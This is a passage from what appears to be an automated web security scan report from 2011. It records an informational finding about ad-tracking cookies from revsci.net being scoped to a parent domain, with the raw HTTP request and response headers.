Set-Cookie: rsi_segs_1000000=pUPF4jmhOXMMH/C1v6FY5BD9CU6du67BSgvgzGDKYyViGy3JIntSYSCogy2dpq+vTNYcB2lBiDYquxbyc5KyKQd662VMvFJPv1Uq5+hEiNuMv1rrcc9IMSklF2Gl2leH2QScoPwA+qc3858Y0/EEUtJOb1lLVH7Jl7Qf05Ccm9I0A591R0ytDmk3/dhVjwiYtzytZlIJs1ik2IzzOBdpWnUkraZOkhZsuD2xFpH4bDNowwn1Mt6VN61EZkp2gq18WYyq/SwVfAgPacfnhGNoa0j2t6d0mKqWyDVTpo7MOHvpI6TY+rVFV0ctXwqwKtzHWcvOQB1vIOCq3gJbKRdOm8g5ervgtODIWCpKrzehFnf3uFwSbzJASDXKbvuyElRzC3QIB16NfHLy3I3DHw2HO9V+T/KCfhRH7Rg8tuvS6l9sIJ6bwWwyxkslqSob+BWyiSkct1E9Ls74UZqgkQVKs4e/XX/Cvi2KZJnZwugqUBC7SOgAIaDhyR5Dg8c/GsPevQXpUlriLOF4Et1lLKW9x3zc7WGaredOrZXJsBbxC1C7mN5tx6+Q1SUPA1gHY+f4H+VkKygKQ4CpXw31XbXpJItZ0B92GzzCcXVkAmiLUQSOYV1W/Xy3POJ+TzKnDfYSd8TU8zoIYLon5ZgAMALC/NMZCwDrluIvv94WuEX/TlfGa5341PraigX3lIAkpAbjmPB9q8wtyPoXTFON4tmbY3kWHTnleZLQfDfv64aXjU4vTZ/h45ksmfnshZDire56+37j; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:08 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://ib.adnxs.com/seg?member=514&add_code=
Content-Length: 0
Date: Wed, 06 Jul 2011 14:01:07 GMT

9.28. http://pix04.revsci.net/K08784/b3/0/3/1008211/203785884.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/K08784/b3/0/3/1008211/203785884.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF4jlBeHIMH/C1v6FY5PjO22rQpqLIRj7lzGDK0pZ5a28Qjg614UTo+UUZb5s27MU3p+k1fyDJMFC8UMYTHbX5oy7V/9AyP3MKtaUdhNOZLiDzifUwJ6G017VVI1pv3eQy/8vqbtJkyjk7nE4KE7l/wLZt8DhbakiEW/VLtFEXckivfAVqRuzLjZec6jzqKaqKrjFKfHSYNLNHdNVX11b+xXjbYwlDNyJv0Fhoh3zSBDAaKUDjNkPyWg082tNhETKy7tEFVMoqZ4uQwGoPaO/utnIBrsOkDHbwJWsvQGaGUzBhsCsTUS3GspLlv9PXwnuiXdyyzDdBLkO0mpRqHFg8ZjtJA1IYrzt9napRSvbPxXmagthUik25xORIWYKMM7HWh842q0BgXmYHsemlc/aTVfxqrc4qPByTJ1/04AbqT1ntuJN8Y2uTzuJL7+yhOY5PR6c6iO+wh5akL8lEX9k83bGIOi1VbGjYD104xeGlS2VbjzTa9xmTTzPgR4WxHTJ7rSM8NBbzW1HUX2RVATZ0oTIKIxS+0QrtvdM65TwP8es2F6hzh/35CSJ6tH8UW+bnd52pUZcMb0ML4RJKJeoi4STpyI+wRAv4qTNgQqrlgpxeLO6jE3LM1jGedmZzMbpa44eSz2wwCvt/eg8hvBNb0m9iWVuG7zkS6R6mjJHs5aC0GQaVlR3x7MrPAjqaWMiNPYdtPtZsbjVEz8ALgUQRikbtowMS6xzKwPAZe46dB7pUA25X2IyUW/OMLa+vBIGcp73PBb7SrYs=; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:08 GMT; Path=/
rtc_vsLf=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; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:08 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K08784/b3/0/3/1008211/203785884.js?D=DM_LOC%3Dhttp%253A%252F%252Ftechflash.com%252F%253Fpid%253DACBJ%2526_rsiL%253D0%26DM_EOM%3D1&C=K08784 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=pUP94z+huXIMH/C1v6FY5BD9CU6duy5U1bkTIGbg2kQ6O500fvSx4UTo+UUZb5s27MU/gF1/ux7sGskdcPE/6idJLlUd7AAuXxxKy8BUcq3cPyLWWekcccnlFzHzZkpIVGfqfRixeJKIBCGYBys6pp34bnWBjoi4hWw0DEv8dZ1MKmhKcNVsgETg9Nxm9eUl2bYV4lz3F2qKGE4AQLEr2EpApywjvzC6ooxJGX2EpUDKZlDNGVCwlbwye561cEN0B95VelQaph/AIlLefSqhn5oCS/k/ffgQkvaHKwO3Hq2Jzt8Egb1MjdZhZUG2cS4+A/q9YkInuHps6t/FPHBFw5HhQo4/Cnazuco89WTgh/dG0NX2NzX9OHtWRemoBuTHV9Uzk58uZ3qvc/CWxOl0LVo6Mubh94RiFrR2pY2eUGuzMIfxqu1g5tF34x6XqpYBxymEeg7y5u6rHubC+TdBqemh88ANgsz6DyIi8PlIddeOxKdS38ycSBeL7ivCg9OcwKHelps5XFngUJ3CsZmV1D8+myaR+JjiRqTsZ5lwsaSdrB1ttygPM0cJVYaoJtMmveKTqltFKrTirU5KmpF8YBVx81cnIA2P6JaVmf2NK10qC7myMOpZ9M0P7sDNtMtyhoW8vaHg+DQsVRT4OB3V/8sMk/tMnEbNnGx1TV0N3YMAdxJkT99c4I4VazVkf7e8/iyP8wGSmzPUsD5yKdOMe1AeGm4f8IRVXN+eZ/iJtioCfSYznCj/ZRVHpQ8GtMbVwmql1/CQzDUY; rtc_Vpu9=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; rsiPus_TE1N="MLsXtTENJApvJ5EkOsXUOAMIrN7cVDsRAI1JlA2+kP2O+rpZrFxjRJpWO95J9jw2ez7PuZwvYpKzPZnmx73e3+g+RBhF6m2qS5qlx6y79pJEUaqR3iscgzeYYjYHE4zarxjYFkAK699GLRvC/lOpNi3oKjSDUjQz6bRd5RumVseON9retzHXthkJz7rmg/AoXcHq/5pWJqRHvxa4sjMtfKPaDQ33n2MzatS1JHKj3inoOBwKFOrUvo8YaYkbDBX35ir0cxEU/FuG0/p0o7qD+/iAZjMCOEMSy6LFwfP/J639cuKKTM9hCsXY7SRInhwCovfpF72sRVZjw87NKbbB5Qql0y6OOGyQHjmdqnB673xTTed/W8l8FYytBOFCjfyyAn+9fAsQpGJACvABUg65KeD2WZxuUkW8tcwRvHrD8CCkEjJAiJaJ82KVgPv/NORGeWc9yQYH8J8DvtXM30s4lrbgRaOIuDlgmpCQPyY96wRUB5WctGJ5ukZ+VdijEsGEXKuAkODAAvCZgyZdj8pk/yhkS0E5DWzwQNhbMQqx9ZcSOd2BRF73UX97YK9Y2LBhI5D5YdW6AxIcxgZ75K3YEm2jyg8wVYiegYI4koi6fjSUGpU/aclERWBbApHsM8wQvxy/xAjqz5YU6sjueUp2EQCgOSizhocs/l635dkgU41sM3QM4vfW+yqPZggnyj4CCBDgYunklnGSR1uUwhJ5hDMoOqLrb5l6iy7ocKWjGp4dHvAEKwJ9W7MtSY1f41qRjmHDNW9/r6Q8aJUKpTJDmtMSHptJB5b7H/DyCI9h2P2Jc53oHYsuhzMyCqTEHsZ1NHiZncWyXVikqCft8J5KWWMaHRDZJ4xrlnYbg9QbfDpW13lV2wfIa5JYPZCAicT6d7jumtyAidZ9MhQT3qWk+vU2eX/ch32cEA3iYr2o27vwbqcnfZMKtZLUqKawF9qclwanTscXsJVIuz+EFY2T/cgVP6dGTkX0PEfzwfQto1hHpBtSU+5CiN7tPVfU3EWnub4+QSFEOUm98aAA9rwkukyqI0H52kYMKTrOExsDgc4HCR3ZpaW/yqUqrkZtHgwrPXhRSgzmUynN1lnLdZIdNR1ojLIOQfdCYDd8YoVzuIGzZBAACC754kxcTZjDmurWrZoeWjI2k4sycb8WveRTIGNS0tCpCEnvVK6DRSZeRPZ94F89r62QMAUaW0jXDnDKORbKBvUUy2WvWoaGLHNMjts8k4qt7Pta2W9Yam9cirruDGatLKblpOHKBcIUQK0tZfcSJIXU/LdkOfqtbzkELtKtuTyGXEnQxPmL98WMjfKPjd9BbcZfBwr+okep4nH+ENdSMYVP/LRqrdQdRIpj3oIsiVfqfv5kuG3oAA0+UypOfQ/LDMyvu1OeQgp7zfqCKAW9gNK3JnMhNNyF2y+GB3/bTOyaIWb9WyJTQ6FZp0Lp4mbDTa0xbsVieWfPhWs1ui+rGo+GHkveFJJKHiuHlJ/yTOvZNAA4cv9yWcaSVCbV9gfI/liUeuPq30bAU6XE+IFUECA8aiAUIfwBYuEgbzMkZpqjj8XvpIGujHXxiCPL"; rsi_us_1000000="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"; udm_0=MLv3NzUNbjpr3hfhvURQO7bVnc3Latc29T4IRbcs6OIWwxvfrNL/DOg1H1jrVqpsW0lWW4HtqMd7E+Uk5EzwLMOJAF+KNwwvW70D8Wocb+lGcNYP/uVmI8EAnSaGIlLRuAZXx5ZGXJTbr4U67p6Nmptr4BJmF8czLH3P6CzlXoqpP/AqWqHnFiNetqPWOif4QVTii6uy+8fRFg3ceiBW4qlM/6vhrY47MwXPFbPvvHDJ3QtIInpUPLFKnoac2xOWgbaZU82eHi3DdXUTS9R4AV4RQ+dn9HWu9sMszBaK/WByvVshR4FnYfVtmSItAsfgC7n1tO1YdoHGVxupt/38v1DYoEvv8mHa1TNZXOYZ+PKeLqhyRjT5FA3BIAdkEnZeU/b8qRIXTPPZsXfV8y2DtD4UvHS2lhhVN7vY6Ktt8kn5aAEKM/sI99+4Y44sdqDU7C4U3d2buYp9bKOzrlZoJStEZTC9cMt4uOkwOQKq+HClC0YwpnRI+RYgR22ErSsIpamH8gzUv57gNxj4RxN8PSQE2dJBoo3wLtqLVA65yBuEzbCE5YZT2PoTFoYC7HUf+RwSGVqHLBAdy3gFEaxmYdMIaD/cSHi46fXLe8Cjx34VD2Dnbq+YzIx1JE79YKvGlEBJPPViqmJAVNOAwegES9AFZTsC9sJnl5s/497ONiFtBSEmn4BiuHzFLKi7C2XxRiPNqV43M7bWFYQbiYz8xbH7WZmvLZJ+AOlG3Onnnyp7Hun60z6duZ8H5kvJAhtuaeiWvgU9wvTIz3cVEmF3LyEq+82UmG2j5BtliZuLOFroZWYr2zZMhIjh3tRtrXkZ/OHSvr5pIXuALDryFTkD6hX9i3qpwcSXANiyjRhG5XfquJM7S1IVn5j5yMjNLu8F4sYckSt66B8yvYVRw8jGdneM5IbfudUCxODOmpoWr8Su2FC1VWHnp9AytRFYyurTGbz4ynHTH+6VBHucy+1Obxiyw/wr3P5mD7RcgSYmdkF/DP6xl9bfnuCKyKuEbayFkkugKbhXyjbt7s/ytyzvWlHmmdLGhoGSo9lVinKWjCWsFEri5fsT6dXcd3DW7m04GhQ9NEyv8t24u5It+hywVMh407VyvFxLQr57u+hn9oh5ofDZUEap/uQHWjyPmj4S+a8MI2yegIuSq7QdSHIrWfep30rYVOzJZjmGSKAvVDRboKmhRkdEpskBWY7ved+EVqqEWGcOc3C8Kv+hSFOnoB17n/vLB/syQK9dPGy6zteVAjqNB9pn7Bc4o69Bsl+A7aEM9AMHvhrZh1vYWw4MDoaIrA9dGLcL0oOBCKhgwBBud9MOP3gtaQaGIRoXzQV6uVZ2/A+XZpi1BfXB1BE6bMQnAhUUuepfy8RIuUGm6pvdxFeM8KVin+L3pLENGei3NaIGE2iMfLs8jv1fq1D5PwQcvMzZs541ABWbrQzmR0H2EbzvqdGh1bgNAPE0I4vZr+BIi5g1FtdHTv6wcjeLM87cvyYzgIw8R/rOr/b3cB3nexjtIQCAelIlihMTfWysxZ0wWajQI9JioKfrc93VMVDy/O2HDYKbKaIK6Zv0ETyvMG/dbRSDhPM7WaYxo71F/pCWlLROcSUg7tMtcwBVd8Bx+EolOzoSz8hgWe5977t7UZL/iigxbwAOJxt4S7Uw5MX207E1acWpPGo1OQfdvBhY5CXzA+xxh/MdxxFvAM4gGytM60RFkVDlezaEojWN+Xv9Ut+o+3U/QT8IWZfEyFNcQtoftGgpRslxCIHUtS8+Sr4d88ot8mjFZJ+35zhbkq4AIxADxJ1hvDzGng==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_Vpu9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_v0Na=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_SA26=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_iydh=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
